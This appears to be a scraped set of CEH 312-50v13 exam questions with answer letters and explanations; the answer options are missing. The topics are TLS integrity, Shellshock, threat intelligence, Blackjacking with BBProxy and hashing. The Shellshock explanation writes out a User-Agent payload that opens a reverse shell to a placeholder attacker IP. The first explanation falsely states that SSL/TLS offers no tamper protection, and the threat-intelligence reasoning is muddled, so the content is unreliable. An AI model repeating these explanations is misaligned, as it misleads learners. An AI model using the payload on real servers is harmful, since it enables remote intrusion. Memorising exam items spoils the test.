You are the chief cybersecurity officer at CloudSecure Inc., and your team is responsible for securing a cloudbased application that handles sensitive customer data. To ensure that the data is protected from breaches, you have decided to implement encryption for both data-at-rest and data-in-transit. The development team suggests using SSL/TLS for securing data in transit. However, you want to also implement a mechanism to detect if the data was tampered with during transmission. Which of the following should you propose?
Correct Answer: A
SSL/TLS is a protocol that provides encryption and authentication for data in transit between a client and a server. However, SSL/TLS does not provide any protection against data tampering, which is the alteration, deletion, or insertion of data without authorization or proper validation. Data tampering can compromise the integrity and accuracy of the data, and potentially lead to breaches or fraud. To detect and prevent data tampering, you should implement IPsec in addition to SSL/TLS. IPsec is a protocol that provides encryption, authentication, and integrity for data in transit at the network layer. IPsec uses cryptographic mechanisms, such as digital signatures and hash-based message authentication codes (HMACs), to verify the identity of the sender and the receiver, and to ensure that the data has not been modified during transmission. IPsec can also provide replay protection, which prevents an attacker from retransmitting old or duplicate packets. By combining SSL/TLS and IPsec, you can achieve a higher level of security and reliability for your cloud-based application. References: * EC-Council CEHv12 Courseware Module 18: Cryptography, page 18-20 * EC-Council CEHv12 Courseware Module 19: Cloud Computing, page 19-29 * A comprehensive guide to data tampering * Tamper Detection
312-50v13 Exam Question 72
What is the most common method to exploit the "Bash Bug" or "Shellshock" vulnerability?
Correct Answer: C
In CEH v13 Module 06: Malware Threats, the Shellshock vulnerability (CVE-2014-6271) is described as a severe bug in the Bash shell where specially crafted environment variables could be used to execute arbitrary commands. The most common attack vector: Web servers using CGI scripts written in Bash. Attackers send malicious HTTP requests to CGI endpoints where Bash executes commands. Exploitation looks like: User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1 Reference: CEH v13 Module 06 - Shellshock Vulnerability Explanation National Vulnerability Database: CVE-2014-6271
312-50v13 Exam Question 73
Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization's network. Which type of threat intelligence is used by Roma to secure the internal network?
Correct Answer: C
In CEH v13 Module 01: Information Security Fundamentals, the types of threat intelligence are categorized as Strategic, Tactical, Operational, and Technical, each serving different security roles. Tactical Threat Intelligence - Correct Answer Definition: Provides information in a machine-readable format such as indicators of compromise (IOCs) - including IP addresses, file hashes, URLs, domains, and signatures. Purpose: Used to update security appliances like firewalls, IDS/IPS, endpoint protection to automatically detect and block threats in real-time. Roma used threat intelligence in this exact way - automating detection and blocking via security tools. Why Other Options Are Incorrect: A: Technical Threat Intelligence: Often overlaps with tactical but usually refers to low-level indicators used for internal analysis, not device-ready feeds. B: Operational Threat Intelligence: Focuses on specific campaigns, attacker TTPs, and is generally not automated or directly used in security appliances. D: Strategic Threat Intelligence: High-level, non-technical insights for executives and decision-makers - used for long-term planning, not immediate threat blocking. Reference: Module 01 - Threat Intelligence Types and Usage Scenarios CEH iLabs: Ingesting IOCs into a Firewall for Tactical Threat Defense CEH v13 eBook: Threat Intelligence Integration into Defensive Systems
312-50v13 Exam Question 74
A large company intends to use BlackBerry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack?
Correct Answer: B
The Blackjacking attack involves leveraging a compromised BlackBerry device and its connection through the BlackBerry Enterprise Server (BES) to tunnel back into the internal corporate network, bypassing perimeter firewalls. The tool used in this method is BBProxy. BBProxy is installed on the BlackBerry device and establishes a covert tunnel via BES, allowing attackers to pivot into the internal LAN from outside the perimeter. Reference - CEH v13 Official Study Guide: Module 17: Hacking Mobile Platforms Quote: "Blackjacking is a technique in which attackers use BBProxy to exploit a trusted path from a BlackBerry device to the corporate LAN through BES." Incorrect Options Explained: A). Paros Proxy is a web proxy used for intercepting HTTP/S traffic. C). Blooover is used for Bluetooth security auditing. D). BBCrack is used for password recovery on BlackBerry devices, not for tunneling.
312-50v13 Exam Question 75
What is the main security service a cryptographic hash provides?
Correct Answer: C
Comprehensive and Detailed Explanation: Cryptographic hash functions provide: Integrity: Any change in the input changes the output hash. Collision Resistance: It is computationally infeasible to find two inputs that produce the same hash. This ensures data is not altered during transmission. From CEH v13 Courseware: Module 10: Cryptography # Hashing Functions (e.g., SHA-256, MD5) Reference:NIST SP 800-107 - "Cryptographic hash functions provide integrity by detecting changes in data via collision-resistant functions."
